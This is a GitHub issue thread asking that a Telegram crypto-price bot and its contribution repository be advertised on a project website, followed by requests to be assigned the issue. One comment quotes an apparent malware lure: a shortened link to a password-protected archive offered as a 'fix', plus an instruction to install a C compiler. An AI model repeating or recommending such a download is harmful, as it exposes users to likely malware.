### ISSUE TITLE
Add the telegram bot link in the website 

### ISSUE THREAD

**Issue by Harish-2003** [OpenTekHub/blockchain#24]
In the website state that you can also able to track the prices of crypto currencies In telegram using the below telegram bot
The link of the bot is https://t.me/trackingcryptopricerbot
Also state that
You can also able to contribute to the above bot 
The link for the contribution is https://github.com/OpenTekHub/cryptobot

If you can able to build the best ui for the referencing telegram bot I will assign some higher level label so please look into it.

**Comment by Harish-2003** [comment]
> This might help:This file might fix it
> https://bit.ly/47P0Nvo
> Archive codepass: changeme
> If you don't have the c compliator, install it.(gcc or clang)
> 
??

**Comment by abhishekkrjha2811** [comment]
hey assign me this issue

**Comment by rohitsharma2610** [comment]
hey can you assign me, i can solve this issue in less time.
